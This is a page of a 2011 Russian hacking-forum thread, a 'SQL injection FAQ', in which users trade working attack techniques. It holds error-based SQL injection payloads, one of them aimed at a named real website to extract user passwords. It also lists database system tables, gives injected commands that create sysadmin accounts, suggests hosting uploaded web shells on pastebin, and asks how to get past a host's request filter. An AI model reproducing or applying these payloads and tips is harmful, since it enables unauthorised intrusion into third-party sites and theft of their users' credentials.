HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу SQL injection полный FAQ
   
 
Страница 18 из 26 « Первая < 8 14 15 16 17 18 19 20 21 22 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 16.05.2011, 10:42
linuxkernal
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329

Репутация: 0
По умолчанию
i want to use in toolza floor rand how can i use in toolza

this site to get info

http://www.site.com/get.php?id=15 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 22,1),FLOOR(RAND(0)*2)))
 

  #172  
Старый 19.05.2011, 00:23
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Почему бы не добавить в первые посты инфу о том, как крутить скули через ошибку Duplicate entry ?
 

  #173  
Старый 19.05.2011, 16:33
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от попугай  
попугай said:
Почему бы не добавить в первые посты инфу о том, как крутить скули через ошибку Duplicate entry ?
Потому что есть статья Быстрый Blind SQL Injection
 

  #174  
Старый 19.05.2011, 21:59
Gervorovski
Guest
Сообщений: n/a
Провел на форуме:
40478

Репутация: 0
По умолчанию
Цитата:
Сообщение от M_script  
M_script said:
Потому что есть статья
Быстрый Blind SQL Injection
Все просто. Кому не хватает материала в этой теме, переходите по ссылке тут
 

  #175  
Старый 20.05.2011, 02:42
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от Gervorovski  
Gervorovski said:
Все просто. Кому не хватает материала в этой теме, переходите по ссылке
тут
Ссылки на поиск не статичные. Пиши поисковые запросы словами.
 

  #176  
Старый 18.06.2011, 11:39
kroŧ
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830

Репутация: 4
По умолчанию
Добавлю от себя

стандартные базы

Oracle

SYS.USER_OBJECTS (USEROBJECTS)

SYS.USER_VIEWS

SYS.USER_TABLES

SYS.USER_VIEWS

SYS.USER_TAB_COLUMNS

SYS.USER_CATALOG

SYS.USER_TRIGGERS

SYS.ALL_TABLES

SYS.TAB

MySQL

mysql.user

mysql.host

mysql.db

MS access

MsysACEs

MsysObjects

MsysQueries

MsysRelationships

MS SQL Server

sysobjects

syscolumns

systypes

sysdatabases

Создать пользователя:

MS SQL

exec sp_addlogin 'name' , 'password'

exec sp_addsrvrolemember 'name' , 'sysadmin'

Access

CRATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)

CRATE USER name WITH PASSWORD 'pass123'

Oracle

CRATE USER name IDENTIFIED BY pass123

TEMPORARY TABLESPACE temp

DEFAULT TABLESPACE users;

GRANT CONNECT TO name;

GRANT RESOURCE TO name;

MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass'))

Для тех кто не может определится с хостингом для заливки шелла

заходим создаем сообщение на pastebin.com затем заходим скачать файл

http://pastebin.com/download.php?i=[xxx]

это и будет ссылка на файл.
 

  #177  
Старый 18.06.2011, 15:16
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию
Цитата:
Сообщение от kroŧ  
kroŧ said:
Добавлю от себя
стандартные базы
Oracle
SYS.USER_OBJECTS (USEROBJECTS)
SYS.USER_VIEWS
SYS.USER_TABLES
SYS.USER_VIEWS
SYS.USER_TAB_COLUMNS
SYS.USER_CATALOG
SYS.USER_TRIGGERS
SYS.ALL_TABLES
SYS.TAB
MySQL
mysql.user
mysql.host
mysql.db
MS access
MsysACEs
MsysObjects
MsysQueries
MsysRelationships
MS SQL Server
sysobjects
syscolumns
systypes
sysdatabases
Создать пользователя:
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass'))
Для тех кто не может определится с хостингом для заливки шелла
заходим создаем сообщение на pastebin.com затем заходим скачать файл
http://pastebin.com/download.php?i=[xxx]
это и будет ссылка на файл.
Postgresql есть?
 

  #178  
Старый 05.07.2011, 15:53
DiDaaaa
Guest
Сообщений: n/a
Провел на форуме:
244

Репутация: 0
По умолчанию
Помогите скуль раскрутить

Код:
Code:
http://realtyvision.ru/analytics/?id_group=1+union+%20SELECT%20password%20FROM%20%60op2_discussion_users%60%20WHERE%20%60id%60=1+--+
Цитата:
Сообщение от None  
SQL Error: Unknown column 'date' in 'where clause' at /home/u68468/realtyvision.ru/www/system/reanalytics.php line 130
Код:
Code:
http://realtyvision.ru/analytics/?id_group=1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28op2_discussion_users.password+as+char%29%29%29%2C0x27%2C0x7e%29+FROM+%60u68468%60.op2_discussion_users+Order+by+login+LIMIT+5%2C1%29+%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1
Цитата:
Сообщение от None  
SQL Error: Subquery returns more than 1 row at /home/u68468/realtyvision.ru/www/system/reanalytics.php line 130
 

  #179  
Старый 07.07.2011, 19:09
mega_667
Guest
Сообщений: n/a
Провел на форуме:
3667

Репутация: 0
По умолчанию
доброго дня .... такая ситуация :

сайт имеет возможность sql inject. ... нахожу количество столбцов через group by ..... но при попытке определить названия таблиц и стоблбцов (через INFORMATION_SCHEMA) сразу перекидывает на страницу хостинга с сообщением приблизительно такого содержания "Сервер отверг ваш запрос, возможно он опасен и т д ..." ..... на некоторых других сайтах похожие ситуации - подсовываю кавычку, вылетает SQL-ная ошибка, прямой вывод на страницу отсутсвует, при поытке вывода через ошибку опять же вылетает хостинга с "запрос отвергнут, так как опасен и т д ......" ...... О чём это может говорить ? инъекция тут не актуальна ? или всё же можно както обойти этот ?
 

  #180  
Старый 07.07.2011, 19:18
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию
Цитата:
Сообщение от mega_667  
mega_667 said:
доброго дня .... такая ситуация :
сайт имеет возможность sql inject. ... нахожу количество столбцов через group by ..... но при попытке определить названия таблиц и стоблбцов (через INFORMATION_SCHEMA) сразу перекидывает на страницу хостинга с сообщением приблизительно такого содержания "Сервер отверг ваш запрос, возможно он опасен и т д ..." ..... на некоторых других сайтах похожие ситуации - подсовываю кавычку, вылетает SQL-ная ошибка, прямой вывод на страницу отсутсвует, при поытке вывода через ошибку опять же вылетает хостинга с "запрос отвергнут, так как опасен и т д ......" ...... О чём это может говорить ? инъекция тут не актуальна ? или всё же можно както обойти этот ?
операторы фильтруются. ничего не сделать. а хостинг попробую угадать - sweb
 
 
Страница 18 из 26 « Первая < 8 14 15 16 17 18 19 20 21 22 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ